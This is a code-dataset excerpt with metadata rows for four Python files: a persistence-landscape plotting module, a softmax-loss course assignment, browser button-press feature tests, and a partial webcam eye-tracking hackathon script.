hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
972afb3d4c0738dfd67ed2bca6fd1dce5f4ad90d
| 9,782
|
py
|
Python
|
persim/landscapes/visuals.py
|
DeliciousHair/persim
|
4702251c22d4fffbb1c29409f466745c6b6c26c5
|
[
"MIT"
] | 67
|
2018-10-03T18:46:25.000Z
|
2022-01-27T19:45:30.000Z
|
persim/landscapes/visuals.py
|
DeliciousHair/persim
|
4702251c22d4fffbb1c29409f466745c6b6c26c5
|
[
"MIT"
] | 47
|
2018-08-09T15:29:08.000Z
|
2022-02-28T19:45:06.000Z
|
persim/landscapes/visuals.py
|
DeliciousHair/persim
|
4702251c22d4fffbb1c29409f466745c6b6c26c5
|
[
"MIT"
] | 33
|
2018-08-09T17:34:47.000Z
|
2021-10-01T13:41:21.000Z
|
"""
Visualization methods for plotting persistence landscapes.
"""
import itertools
from operator import itemgetter
import matplotlib as mpl
from matplotlib import cm
import matplotlib.pyplot as plt
import numpy as np
from .base import PersLandscape
from .exact import PersLandscapeExact
from .approximate import PersLandscapeApprox
mpl.rcParams["text.usetex"] = True
__all__ = ["plot_landscape", "plot_landscape_simple"]
def plot_landscape(
landscape: PersLandscape,
num_steps: int = 3000,
colormap="default",
title=None,
labels=None,
ax=None,
):
"""
Plot landscape functions
"""
if isinstance(landscape, PersLandscapeApprox):
return plot_landscape_approx(
landscape=landscape,
num_steps=num_steps,
colormap=colormap,
title=title,
labels=labels,
ax=ax,
)
if isinstance(landscape, PersLandscapeExact):
return plot_landscape_exact(
landscape=landscape,
num_steps=num_steps,
colormap=colormap,
title=title,
labels=labels,
ax=ax,
)
def plot_landscape_simple(
landscape: PersLandscape,
alpha=1,
padding=0.1,
num_steps=1000,
title=None,
ax=None,
):
"""
plot landscape functions.
"""
if isinstance(landscape, PersLandscapeExact):
return plot_landscape_exact_simple(
landscape=landscape, alpha=alpha, title=title, ax=ax
)
if isinstance(landscape, PersLandscapeApprox):
return plot_landscape_approx_simple(
landscape=landscape,
alpha=alpha,
padding=padding,
num_steps=num_steps,
title=title,
ax=ax,
)
def plot_landscape_exact(
landscape: PersLandscapeExact,
num_steps: int = 3000,
colormap="default",
alpha=0.8,
labels=None,
padding: float = 0.1,
depth_padding: float = 0.7,
title=None,
ax=None,
):
"""
A plot of the exact persistence landscape.
Warning: This function is quite slow, especially for large landscapes.
Parameters
----------
num_steps: int, default 3000
number of sampled points that are plotted
color, defualt cm.viridis
color scheme for shading of landscape functions
alpha, default 0.8
transparency of shading
padding: float, default 0.1
amount of empty grid shown to left and right of landscape functions
depth_padding: float, default = 0.7
amount of space between sequential landscape functions
"""
fig = plt.figure()
plt.style.use(colormap)
ax = fig.gca(projection="3d")
landscape.compute_landscape()
# itemgetter index selects which entry to take max/min wrt.
# the hanging [0] or [1] takes that entry.
crit_pairs = list(itertools.chain.from_iterable(landscape.critical_pairs))
min_crit_pt = min(crit_pairs, key=itemgetter(0))[0] # smallest birth time
max_crit_pt = max(crit_pairs, key=itemgetter(0))[0] # largest death time
max_crit_val = max(crit_pairs, key=itemgetter(1))[1] # largest peak of landscape
min_crit_val = min(crit_pairs, key=itemgetter(1))[1] # smallest peak of landscape
norm = mpl.colors.Normalize(vmin=min_crit_val, vmax=max_crit_val)
scalarMap = mpl.cm.ScalarMappable(norm=norm)
# x-axis for grid
domain = np.linspace(
min_crit_pt - padding * 0.1, max_crit_pt + padding * 0.1, num=num_steps
)
# for each landscape function
for depth, l in enumerate(landscape):
# sequential pairs in landscape
xs, zs = zip(*l)
image = np.interp(domain, xs, zs)
for x, z in zip(domain, image):
if z == 0.0:
# plot a single point here?
continue # moves to the next iterable in for loop
if z > 0.0:
ztuple = [0, z]
elif z < 0.0:
ztuple = [z, 0]
# for coloring https://matplotlib.org/3.1.0/tutorials/colors/colormapnorms.html
ax.plot(
[x, x], # plotting a line to get shaded function
[depth_padding * depth, depth_padding * depth],
ztuple,
linewidth=0.5,
alpha=alpha,
# c=colormap(norm(z)))
c=scalarMap.to_rgba(z),
)
ax.plot([x], [depth_padding * depth], [z], "k.", markersize=0.1)
ax.set_ylabel("depth")
if title:
plt.title(title)
ax.view_init(10, 90)
plt.show()
def plot_landscape_exact_simple(
landscape: PersLandscapeExact, alpha=1, title=None, ax=None
):
"""
A simple plot of the persistence landscape. This is a faster plotting utility than the standard plotting, but is recommended for smaller landscapes for ease of visualization.
Parameters
----------
alpha, default 1
transparency of shading
"""
ax = ax or plt.gca()
landscape.compute_landscape()
crit_pairs = list(itertools.chain.from_iterable(landscape.critical_pairs))
min_crit_pt = min(crit_pairs, key=itemgetter(0))[0] # smallest birth time
max_crit_pt = max(crit_pairs, key=itemgetter(0))[0] # largest death time
max_crit_val = max(crit_pairs, key=itemgetter(1))[1] # largest peak of landscape
min_crit_val = min(crit_pairs, key=itemgetter(1))[1] # smallest peak of landscape
# for each landscape function
for depth, l in enumerate(landscape):
ls = np.array(l)
ax.plot(ls[:, 0], ls[:, 1], label=f"$\lambda_{{{depth}}}$", alpha=alpha)
ax.legend()
if title:
ax.set_title(title)
def plot_landscape_approx(
landscape: PersLandscapeApprox,
num_steps: int = 3000,
colormap="default",
labels=None,
alpha=0.8,
padding: float = 0.1,
depth_padding: float = 0.7,
title=None,
ax=None,
):
"""
A plot of the approximate persistence landscape.
Warning: This function is quite slow, especially for large landscapes.
Parameters
----------
num_steps: int, default 3000
number of sampled points that are plotted
color, defualt cm.viridis
color scheme for shading of landscape functions
alpha, default 0.8
transparency of shading
padding: float, default 0.1
amount of empty grid shown to left and right of landscape functions
depth_padding: float, default = 0.7
amount of space between sequential landscape functions
"""
fig = plt.figure()
ax = fig.gca(projection="3d")
plt.style.use(colormap)
landscape.compute_landscape()
# TODO: RE the following line: is this better than np.concatenate?
# There is probably an even better way without creating an intermediary.
_vals = list(itertools.chain.from_iterable(landscape.values))
min_val = min(_vals)
max_val = max(_vals)
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
scalarMap = mpl.cm.ScalarMappable(norm=norm)
# x-axis for grid
domain = np.linspace(
landscape.start - padding * 0.1, landscape.stop + padding * 0.1, num=num_steps
)
# for each landscape function
for depth, l in enumerate(landscape):
# sequential pairs in landscape
# xs, zs = zip(*l)
image = np.interp(
domain,
np.linspace(
start=landscape.start, stop=landscape.stop, num=landscape.num_steps
),
l,
)
for x, z in zip(domain, image):
if z == 0.0:
# plot a single point here?
continue # moves to the next iterable in for loop
if z > 0.0:
ztuple = [0, z]
elif z < 0.0:
ztuple = [z, 0]
# for coloring https://matplotlib.org/3.1.0/tutorials/colors/colormapnorms.html
ax.plot(
[x, x], # plotting a line to get shaded function
[depth_padding * depth, depth_padding * depth],
ztuple,
linewidth=0.5,
alpha=alpha,
# c=colormap(norm(z)))
c=scalarMap.to_rgba(z),
)
ax.plot([x], [depth_padding * depth], [z], "k.", markersize=0.1)
# ax.set_xlabel('X')
ax.set_ylabel("depth")
if title:
plt.title(title)
ax.view_init(10, 90)
plt.show()
def plot_landscape_approx_simple(
landscape: PersLandscapeApprox,
alpha=1,
padding=0.1,
num_steps=1000,
title=None,
ax=None,
):
"""
A simple plot of the persistence landscape. This is a faster plotting utility than the standard plotting, but is recommended for smaller landscapes for ease of visualization.
Parameters
----------
alpha, default 1
transparency of shading
padding: float, default 0.1
amount of empty grid shown to left and right of landscape functions
num_steps: int, default 1000
number of sampled points that are plotted
"""
ax = ax or plt.gca()
landscape.compute_landscape()
# TODO: RE the following line: is this better than np.concatenate?
# There is probably an even better way without creating an intermediary.
_vals = list(itertools.chain.from_iterable(landscape.values))
min_val = min(_vals)
max_val = max(_vals)
# for each landscape function
for depth, l in enumerate(landscape):
# instantiate depth-specific domain
domain = np.linspace(
landscape.start - padding * 0.1, landscape.stop + padding * 0.1, num=len(l)
)
ax.plot(domain, l, label=f"$\lambda_{{{depth}}}$", alpha=alpha)
ax.legend()
if title:
ax.set_title(title)
| 30.191358
| 178
| 0.617052
| 1,231
| 9,782
| 4.8026
| 0.174655
| 0.023004
| 0.012179
| 0.02977
| 0.833051
| 0.79753
| 0.772497
| 0.766576
| 0.722091
| 0.705853
| 0
| 0.019903
| 0.286036
| 9,782
| 323
| 179
| 30.28483
| 0.826604
| 0.317011
| 0
| 0.739796
| 0
| 0
| 0.019878
| 0.009861
| 0
| 0
| 0
| 0.006192
| 0
| 1
| 0.030612
| false
| 0
| 0.045918
| 0
| 0.096939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
973b82b21d0255df7c34489d439b6a8bf6c24f11
| 6,053
|
py
|
Python
|
assignment1/comp411/classifiers/softmax.py
|
kukalbriiwa7/COMP511_CS231n
|
1537e98cdca43fad906e56a22f48d884523414b0
|
[
"MIT"
] | 1
|
2022-02-06T19:35:05.000Z
|
2022-02-06T19:35:05.000Z
|
assignment1/comp411/classifiers/softmax.py
|
kukalbriiwa7/COMP511_CS231n
|
1537e98cdca43fad906e56a22f48d884523414b0
|
[
"MIT"
] | null | null | null |
assignment1/comp411/classifiers/softmax.py
|
kukalbriiwa7/COMP511_CS231n
|
1537e98cdca43fad906e56a22f48d884523414b0
|
[
"MIT"
] | null | null | null |
from builtins import range
import numpy as np
from random import shuffle
from past.builtins import xrange
def softmax_loss_naive(W, X, y, reg, regtype='L2'):
"""
Softmax loss function, naive implementation (with loops)
Inputs have dimension D, there are C classes, and we operate on minibatches
of N examples.
Inputs:
- W: A numpy array of shape (D, C) containing weights.
- X: A numpy array of shape (N, D) containing a minibatch of data.
- y: A numpy array of shape (N,) containing training labels; y[i] = c means
that X[i] has label c, where 0 <= c < C.
- reg: (float) regularization strength
- regtype: Regularization type: L1 or L2
Returns a tuple of:
- loss as single float
- gradient with respect to weights W; an array of same shape as W
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
#############################################################################
# TODO: Compute the softmax loss and its gradient using explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! Implement both L1 and L2 regularization based on the #
# parameter regtype. #
#############################################################################
# *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
# pass
matmultres = X.dot(W);
classes_count = W.shape[1]
training_data_count = X.shape[0]
if regtype == 'L2':
for i in range(training_data_count):
matmultres_biased = matmultres[i] - np.max(matmultres[i]) # I found this in internet. In the towardsdatascience.com there is an example in which they do this and they say the reason is that they want to avoid very big numbers after exponentiation
softmax = np.exp(matmultres_biased)/np.sum(np.exp(matmultres_biased))
loss = loss -np.log(softmax[y[i]])
for j in range(classes_count):
dW[:,j] = dW[:,j] + X[i] * softmax[j]
dW[:,y[i]] = dW[:,y[i]] - X[i]
loss = loss / training_data_count
dW = dW / training_data_count
loss = loss + reg * np.sum(W * W)
dW = dW + 2 * reg * W
else:
L1_gradient_term = np.ones_like(W)
for i in range(training_data_count):
matmultres_biased = matmultres[i] - np.max(matmultres[i]) # I found this in internet. In the towardsdatascience.com there is an example in which they do this and they say the reason is that they want to avoid very big numbers after exponentiation
softmax = np.exp(matmultres_biased)/np.sum(np.exp(matmultres_biased))
loss = loss -np.log(softmax[y[i]])
for j in range(classes_count):
dW[:,j] = dW[:,j] + X[i] * softmax[j]
dW[:,y[i]] = dW[:,y[i]] - X[i]
loss = loss / training_data_count
dW = dW / training_data_count
loss = loss + reg * np.sum(abs(W))
L1_gradient_term = np.where(W>0,L1_gradient_term,-1)
dW = dW + reg * L1_gradient_term
# *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
return loss, dW
def softmax_loss_vectorized(W, X, y, reg, regtype='L2'):
"""
Softmax loss function, vectorized version.
Inputs and outputs are the same as softmax_loss_naive.
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
#############################################################################
# TODO: Compute the softmax loss and its gradient using no explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! Implement both L1 and L2 regularization based on the #
# parameter regtype. #
#############################################################################
# *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
training_data_count = X.shape[0]
matmultres = X.dot(W)
matmultres_biased = matmultres - np.max(matmultres, axis = 1, keepdims = True)
if regtype == 'L2':
exp__matmultres_biased = np.exp(matmultres_biased)
sum_exp__matmultres_biased = exp__matmultres_biased.sum(axis = 1, keepdims=True)
softmax_mat = exp__matmultres_biased/sum_exp__matmultres_biased
loss = np.sum(-np.log(softmax_mat[np.arange(training_data_count), y]) )
softmax_mat[np.arange(training_data_count),y] = softmax_mat[np.arange(training_data_count),y] - 1
dW = X.T.dot(softmax_mat)
loss /= training_data_count
dW /= training_data_count
loss = loss + reg * np.sum(W * W)
dW = dW + 2 * reg * W
else:
L1_gradient_term = np.ones_like(W)
exp__matmultres_biased = np.exp(matmultres_biased)
sum_exp__matmultres_biased = exp__matmultres_biased.sum(axis = 1, keepdims=True)
softmax_mat = exp__matmultres_biased/sum_exp__matmultres_biased
loss = np.sum(-np.log(softmax_mat[np.arange(training_data_count), y]) )
softmax_mat[np.arange(training_data_count),y] = softmax_mat[np.arange(training_data_count),y] - 1
dW = X.T.dot(softmax_mat)
loss /= training_data_count
dW /= training_data_count
loss = loss + reg * np.sum(abs(W))
L1_gradient_term = np.where(W>0,L1_gradient_term,-1)
dW = dW + reg * L1_gradient_term
# *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
return loss, dW
| 41.458904
| 258
| 0.570791
| 805
| 6,053
| 4.145342
| 0.192547
| 0.0911
| 0.091699
| 0.037758
| 0.795924
| 0.79053
| 0.764759
| 0.764759
| 0.764759
| 0.744381
| 0
| 0.008581
| 0.287626
| 6,053
| 145
| 259
| 41.744828
| 0.765306
| 0.35437
| 0
| 0.852941
| 0
| 0
| 0.002293
| 0
| 0
| 0
| 0
| 0.013793
| 0
| 1
| 0.029412
| false
| 0
| 0.058824
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
978340132361de39b4487cfa062c817b6599329d
| 4,147
|
py
|
Python
|
aloe_webdriver/tests/test_buttons.py
|
nikolas/aloe_webdriver
|
b1bad20eb6b899950186ad288315efc3e80cd959
|
[
"MIT"
] | 4
|
2016-05-02T02:14:08.000Z
|
2020-11-07T14:12:46.000Z
|
aloe_webdriver/tests/test_buttons.py
|
nikolas/aloe_webdriver
|
b1bad20eb6b899950186ad288315efc3e80cd959
|
[
"MIT"
] | 15
|
2016-01-20T22:57:31.000Z
|
2017-02-22T20:57:28.000Z
|
aloe_webdriver/tests/test_buttons.py
|
nikolas/aloe_webdriver
|
b1bad20eb6b899950186ad288315efc3e80cd959
|
[
"MIT"
] | 11
|
2016-02-06T14:08:49.000Z
|
2021-06-09T06:04:46.000Z
|
"""
Test a variety of different buttons.
"""
from aloe.testing import FeatureTest
from aloe_webdriver.tests.base import feature
# pylint:disable=line-too-long
class TestSteps(FeatureTest):
"""Test steps."""
@feature()
def test_press_of_submit_button_by_name(self):
"""
Given I visit test page "button_page"
When I press "submit_button"
Then I should see "You pressed the submit button"
"""
@feature()
def test_press_of_submit_button_by_value(self):
"""
Given I visit test page "button_page"
When I press "Submit button"
Then I should see "You pressed the submit button"
"""
@feature()
def test_press_of_reset_button_by_name(self):
"""
Given I visit test page "button_page"
When I press "reset_button"
Then I should see "You pressed the reset button"
"""
@feature()
def test_press_of_reset_button_by_value(self):
"""
Given I visit test page "button_page"
When I press "Reset button"
Then I should see "You pressed the reset button"
"""
@feature()
def test_press_of_input_button_by_name(self):
"""
Given I visit test page "button_page"
When I press "input_button"
Then I should see "You pressed the input button"
"""
@feature()
def test_press_of_input_button_by_value(self):
"""
Given I visit test page "button_page"
When I press "Input button"
Then I should see "You pressed the input button"
"""
@feature()
def test_press_of_image_button_by_name(self):
"""
Given I visit test page "button_page"
When I press "image_button"
Then I should see "You pressed the image button"
"""
@feature()
def test_press_of_button_element_by_name(self):
"""
Given I visit test page "button_page"
When I press "button_element"
Then I should see "You pressed the button element"
"""
@feature()
def test_press_of_button_element_by_value(self):
"""
Given I visit test page "button_page"
When I press "Button element"
Then I should see "You pressed the button element"
"""
@feature()
def test_press_of_anchor_button_by_name(self):
"""
Given I visit test page "button_page"
When I press "anchor_button"
Then I should see "You pressed the anchor button"
"""
@feature()
def test_press_of_anchor_button_by_value(self):
"""
Given I visit test page "button_page"
When I press "Anchor button"
Then I should see "You pressed the anchor button"
"""
@feature()
def test_press_of_div_button_by_name(self):
"""
Given I visit test page "button_page"
When I press "div_button"
Then I should see "You pressed the div button"
"""
@feature()
def test_press_of_div_button_by_value(self):
"""
Given I visit test page "button_page"
When I press "Div button"
Then I should see "You pressed the div button"
"""
@feature()
def test_press_of_span_button_by_name(self):
"""
Given I visit test page "button_page"
When I press "span_button"
Then I should see "You pressed the span button"
"""
@feature()
def test_press_of_span_button_by_value(self):
"""
Given I visit test page "button_page"
When I press "Span button"
Then I should see "You pressed the span button"
"""
@feature()
def test_press_of_paragraph_button_by_name(self):
"""
Given I visit test page "button_page"
When I press "paragraph_button"
Then I should see "You pressed the paragraph button"
"""
@feature()
def test_press_of_paragraph_button_by_value(self):
"""
Given I visit test page "button_page"
When I press "Paragraph button"
Then I should see "You pressed the paragraph button"
"""
| 27.646667
| 60
| 0.611526
| 555
| 4,147
| 4.336937
| 0.09009
| 0.070627
| 0.098878
| 0.134192
| 0.927711
| 0.927711
| 0.925218
| 0.925218
| 0.873286
| 0.842958
| 0
| 0
| 0.308657
| 4,147
| 149
| 61
| 27.832215
| 0.839554
| 0.495057
| 0
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.459459
| false
| 0
| 0.054054
| 0
| 0.540541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
97cf98505d400230eb24c0b86a67eb76170d6faa
| 9,443
|
py
|
Python
|
eyetracker.py
|
coderrick/HopHacks2017
|
c99e1e23345bfc90c13ab68c9ac22d9d39ec9b83
|
[
"Apache-2.0"
] | 3
|
2017-09-18T14:43:16.000Z
|
2019-01-27T16:46:45.000Z
|
eyetracker.py
|
coderrick/HopHacks2017
|
c99e1e23345bfc90c13ab68c9ac22d9d39ec9b83
|
[
"Apache-2.0"
] | null | null | null |
eyetracker.py
|
coderrick/HopHacks2017
|
c99e1e23345bfc90c13ab68c9ac22d9d39ec9b83
|
[
"Apache-2.0"
] | null | null | null |
#Identify pupils. Based on beta 1
import numpy as np
import cv2
import time
import threading
import recorder
start_time = time.time()
prev_time = 0
STOP = False
eyeMovement = []
def showImage(tempVar, pupilFrame):
for i in tempVar[0,:]:
cv2.circle(pupilFrame,(i[0],i[1]),i[2],(0,255,0),2)
cv2.circle(pupilFrame,(i[0],i[1]),2,(0,0,255),3)
cv2.imshow("frame", pupilFrame)
def getDarkness(img):
data = np.asarray(img)
darkness = 0
for row in range(0, len(data)):
for col in range(0, len(data[0])):
if(data[row][col] < 90):
darkness += 1
return darkness
def process(quadrants):
gradients = []
for row in quadrants:
left = getDarkness(row[0])
right = getDarkness(row[1])
gradients.append([left, right])
return gradients
def replace(img, curr, max):
data = np.asarray(img)
color = ((curr+0.0)/(max+0.0))*255.0
for row in range(0, len(data)):
for col in range(0, len(data[0])):
data[row][col] = color
return data
def end():
global eyeMovement
temp = eyeMovement
eyeMovement = []
cv2.destroyAllWindows()
return temp
def start(seconds, fileName):
thread = threading.Thread(target=recorder.record_on_button_press, args=("input_sound.wav",))
thread.daemon = True # Daemonize thread
thread.start()
cap = cv2.VideoCapture(0) #640,480
w = 640
h = 480
testSize = 15
curr_time = 0
count = 0
baseline = np.array([[0,0],[0,0]])
while(cap.isOpened() and curr_time < seconds):
ret, frame = cap.read()
#print curr_time
#print "-------------"
if ret==True:
#downsample
#frameD = cv2.pyrDown(cv2.pyrDown(frame))
#frameDBW = cv2.cvtColor(frameD,cv2.COLOR_RGB2GRAY)
#detect face
frame = cv2.cvtColor(frame,cv2.COLOR_RGB2GRAY)
frame = frame[0:700, 200:1000]
faces = cv2.CascadeClassifier('haarcascade_eye.xml')
detected = faces.detectMultiScale(frame, 1.3, 5)
#faces = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
# detected2 = faces.detectMultiScale(frameDBW, 1.3, 5)
pupilFrame = frame
pupilO = frame
#
windowClose = np.ones((5,5),np.uint8)
windowOpen = np.ones((2,2),np.uint8)
windowErode = np.ones((2,2),np.uint8)
# draw square
for (x,y,w,h) in detected:
cv2.rectangle(frame, (x,y), ((x+w),(y+h)), (0,0,255),1)
cv2.line(frame, (x,y), ((x+w,y+h)), (0,0,255),1)
cv2.line(frame, (x+w,y), ((x,y+h)), (0,0,255),1)
cv2.rectangle(frame, (x+(w/5), y+(h)), (x+(w*4/5), y+(h*3/4)), (0,0,255), 1)
#cv2.imshow('frame2',frame)
pupilFrame = cv2.equalizeHist(frame[int(y+(h*.25)):(y+h), x:(x+w)])
cv2.line(frame, (x+(w/2),0), (x+(w/2),y+h), (0,0,255),1)
cv2.line(frame, (0,y+(h/2)), (x+w,y+(h/2)), (0,0,255),1)
eye = frame[(y+(h/3)):(y+(h*2/3)), (x+(w/4)):(x+(w*3/4))]
eye = cv2.equalizeHist(eye)
h, w = eye.shape
eye = cv2.flip(eye, 1)
cv2.imshow("Eye", eye)
topleft = eye[0:h/2, 0:w/2]
topright = eye[0:h/2, w/2:w]
bottomleft = eye[h/2:h, 0:w/2]
bottomright = eye[h/2:h, w/2:w]
#cv2.imshow("eye", eye)
cv2.moveWindow("Eye", 100, 100)
# print eye[0, 0]
# print eye[h-1,w-1]
# print eye[0,w-1]
# print eye[h-1,0]
# print "------------"
startx = 0
starty = 0
# cv2.imshow("top left", topleft)
# cv2.moveWindow("top left", startx, starty)
# cv2.imshow("top right", topright)
# cv2.moveWindow("top right", w/2, starty)
# cv2.imshow("bottom left", bottomleft)
# cv2.moveWindow("bottom left", startx, h*2)
# cv2.imshow("bottom right", bottomright)
# cv2.moveWindow("bottom right", w/2, h*2)
quadrants = [[topleft, topright],
[bottomleft, bottomright]]
if(count<testSize):
baseline += np.array(process(quadrants))
elif(count == testSize):
baseline/=testSize
print "Done with Baseline"
else:
difference = np.array(process(quadrants))-np.array(baseline)
#difference = np.absolute(difference)
max = np.amax(difference)
index = np.where(difference==max)
difference = list(difference)
index = list(index)
max = difference[index[0][0]][index[1][0]]
#print max
if(max<75):
#print "Straight Ahead"
eyeMovement.append(0)
continue
for j in range(0, len(quadrants)):
for k in range(0, len(quadrants[0])):
quadrants[j][k] = replace(quadrants[j][k], difference[j][k], max)
if(index[0].any() == 0):
if(index[1].any() == 1):
eyeMovement.append(2)
#print "Top Right"
k = 1
else:
k = 1
eyeMovement.append(1)
#print "Top Left"
else:
if(index[1].any() == 1):
k = 1
eyeMovement.append(3)
#print "Bottom Right"
else:
k = 1
eyeMovement.append(4)
#print "Bottom Left"
count+=1
h*=2
starty+=h
starty+=(h/2)
# cv2.imshow("top left1", quadrants[0][0])
# cv2.moveWindow("top left1", startx, starty)
# cv2.imshow("top right1", quadrants[0][1])
# cv2.moveWindow("top right1", w/2, starty)
# cv2.imshow("bottom left1", quadrants[1][0])
# cv2.moveWindow("bottom left1", startx, h*2)
# cv2.imshow("bottom right1", quadrants[1][1])
# cv2.moveWindow("bottom right1", w/2, h*2)
curr_time = time.time() - start_time
if cv2.waitKey(1) & 0xFF == ord('q'):
break
thread.join()
return eyeMovement
def start_alone(seconds):
cap = cv2.VideoCapture(0) #640,480
w = 640
h = 480
testSize = 15
curr_time = 0
count = 0
baseline = np.array([[0,0],[0,0]])
while(cap.isOpened() and curr_time < seconds):
print curr_time
ret, frame = cap.read()
#print curr_time
#print "-------------"
if ret==True:
#downsample
#frameD = cv2.pyrDown(cv2.pyrDown(frame))
#frameDBW = cv2.cvtColor(frameD,cv2.COLOR_RGB2GRAY)
#detect face
